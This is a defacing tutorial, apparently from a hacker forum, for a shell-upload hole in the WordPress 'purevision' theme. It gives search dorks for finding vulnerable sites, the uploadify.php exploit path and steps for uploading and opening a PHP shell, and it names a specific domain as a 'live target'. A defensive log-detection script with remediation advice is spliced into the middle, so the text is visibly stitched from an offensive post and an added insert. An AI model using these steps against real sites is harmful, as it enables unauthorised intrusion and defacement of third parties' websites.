Defacing With the WP Themes Purevision Shell Upload Vulnerability Method


Hi :* this time I want to share another tutorial, and again it's about defacing a WordPress CMS site :""""v
"Ugh, why WordPress again?", because I feel like it, dummy.
The bug is once again in a theme. More precisely the purevision theme, which is why it's called the WP Themes Purevision Shell Upload Vulnerability. Cool, right B)
On to the tutorial, dummy.

CSRF: online CSRF tool, click here

Dorks:
- inurl:/wp-content/themes/purevision/
- inurl:/wp-content/themes/purevision/sliders/

Exploit path: /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php

1. First, dork using one of the dorks above; if you want better results, dork in Google Images.

2. Go exploit!! If the site is vulnerable a blank page appears (see the image). Exploit path: site.com/(path)/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php

3. Open the online CSRF tool, fill the URL field with your site, and set the POST Type field to Filedata.

4. Click Lock Target and an upload form will appear. Choose your file, then click upload.

5. If it worked, the number 1 will appear on the page. Then just access it at site.com/shellname.php

Now it's up to you what you do next :P
"Ugh, why is the site censored, usually a live target is given", chill, pan8. I'll give you a live target, thumbs up.. That's all.
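From the defender's side, the sequence above leaves a very recognisable trace in the web server access log: a POST to a theme's uploadify.php that returns a tiny body (the "1"), followed shortly by the same client requesting a .php file that is not part of the normal WordPress tree. The script below is an added example written for this page, not code from the post or from the purevision theme; it assumes Apache "combined" log format, and the log lines it parses are constructed samples, not real traffic. It generalises slightly beyond the post by matching an uploadify.php under any theme directory, not only purevision.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log lines in Apache "combined" format.
# Illustrative only; not taken from the post or from any real site.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2016:12:00:01 +0000] "GET /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2016:12:00:09 +0000] "POST /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 1 "http://csrf-tool.example/" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2016:12:00:15 +0000] "GET /shellname.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2016:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Any uploadify.php shipped under a theme directory, with an optional
# sub-path before wp-content (the "(path)" in the post).
UPLOADIFY_RE = re.compile(r'^/(?:.*/)?wp-content/themes/[^/]+/.*/uploadify\.php$', re.I)
# How long after the upload a follow-up request still counts as related (assumption).
FOLLOWUP_WINDOW = timedelta(minutes=10)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]  # drop any query string
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_wp_core_path(path):
    """True for paths inside the normal WordPress tree (wp-admin, wp-content, wp-includes)."""
    return re.search(r'/wp-(admin|content|includes)/', path) is not None


def find_uploadify_abuse(log_text):
    """Return one alert per POST to a theme uploadify.php. Each alert lists
    later requests from the same client to a .php file outside the WordPress
    tree within FOLLOWUP_WINDOW, which is what access to a dropped file looks like."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    alerts = []
    for rec in records:
        if rec["method"] != "POST" or not UPLOADIFY_RE.match(rec["path"]):
            continue
        alert = {"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                 "upload_path": rec["path"], "followups": []}
        for later in records:
            if (later["ip"] == rec["ip"]
                    and rec["ts"] < later["ts"] <= rec["ts"] + FOLLOWUP_WINDOW
                    and later["path"].lower().endswith(".php")
                    and not is_wp_core_path(later["path"])):
                alert["followups"].append(later["path"])
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_uploadify_abuse(SAMPLE_LOG):
        print(f"[{a['ts']}] {a['ip']} POST {a['upload_path']} -> HTTP {a['status']}; "
              f"later .php hits: {a['followups'] or 'none'}")
```

Run it against a real access log by passing the file's contents to find_uploadify_abuse. A hit means the unauthenticated uploader was reached; the fix on the hosting side is to delete the unused uploadify.php from the theme (or deny web access to it in the server configuration) and to check the document root for any .php files the log shows being fetched right after the POST.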

Live Target
- www.copelandtruc-king.com

Thanks to: MichZo - -=P0IS0NERzzID=- - LCR999X - --oo0oo-- - Ryu404 - FreakzSec -./GEMBEL - Mr.L0"Ch0 - RamsNotes31 - [LuCiiFeR] - Mr.BeanCyberID_404 - EquinoX - BL4CK_SKULL_C4P-FnF16 - 0tamega// - ~R3CAPTCHA ID~ - y0sh1 - Mr.L0weRS - Aniki - InurlID - ./Fri4K_4R4nz - /.Mr_Jack154 - XS4BL9 - ~./Khoer - ./Mr.X.Z0NK.X - Xanoi - PheonixTM - MSAttacker - R1z4 - ./Mr. BA645 -./Mr.B3rUk.404 - /Mr.KodoC - Mr. X3R0X - Renym - Anzel4 - Walk3r404z